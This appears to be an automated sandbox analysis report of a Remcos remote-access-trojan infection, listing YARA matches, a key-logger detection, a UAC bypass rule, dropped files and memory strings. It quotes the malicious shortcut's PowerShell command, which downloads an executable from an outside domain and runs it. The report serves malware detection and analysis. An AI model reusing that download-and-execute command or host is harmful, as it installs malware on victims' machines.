Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/support/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Potential key logger detected (key state polling based)

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE304EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	12_2_6FE304EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9204EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	13_2_6C9204EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB04EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	19_2_6FEB04EE

Yara detected Keylogger Generic

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\hello.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: MdkbG2pK4l.lnk

LNK file: /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile %APPDATA%/hello.exe && %APPDATA%/hello.exe

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB0D95 NtdllDefWindowProc_W,	19_2_6FEB0D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB2932 _memset,NtdllDefWindowProc_W,	19_2_6FEB2932
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEAE5F6 NtdllDefWindowProc_W,CallWindowProcW,	19_2_6FEAE5F6

Creates files inside the system directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00404FAA	11_2_00404FAA
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041206B	11_2_0041206B
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0041022D	11_2_0041022D
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411F91	11_2_00411F91
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25E70	12_2_6FE25E70
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE263F0	12_2_6FE263F0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35FB7	12_2_6FE35FB7
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3AE45	12_2_6FE3AE45
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43E3B	12_2_6FE43E3B
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE31D85	12_2_6FE31D85
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0	12_2_6FE25CA0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE42CBB	12_2_6FE42CBB
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36C6C	12_2_6FE36C6C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE36860	12_2_6FE36860
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE4586C	12_2_6FE4586C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE217D0	12_2_6FE217D0
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE43743	12_2_6FE43743
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21730	12_2_6FE21730
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE21739	12_2_6FE21739
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3648C	12_2_6FE3648C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE431FF	12_2_6FE431FF
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3708C	12_2_6FE3708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915E70	13_2_6C915E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9163F0	13_2_6C9163F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92648C	13_2_6C92648C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C932CBB	13_2_6C932CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926C6C	13_2_6C926C6C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C921D85	13_2_6C921D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933E3B	13_2_6C933E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92AE45	13_2_6C92AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925FB7	13_2_6C925FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9117D0	13_2_6C9117D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911731	13_2_6C911731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C911730	13_2_6C911730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C933743	13_2_6C933743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92708C	13_2_6C92708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C926860	13_2_6C926860
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C93586C	13_2_6C93586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9331FF	13_2_6C9331FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5E70	19_2_6FEA5E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA63F0	19_2_6FEA63F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5FB7	19_2_6FEB5FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBAE45	19_2_6FEBAE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEC3E3B	19_2_6FEC3E3B
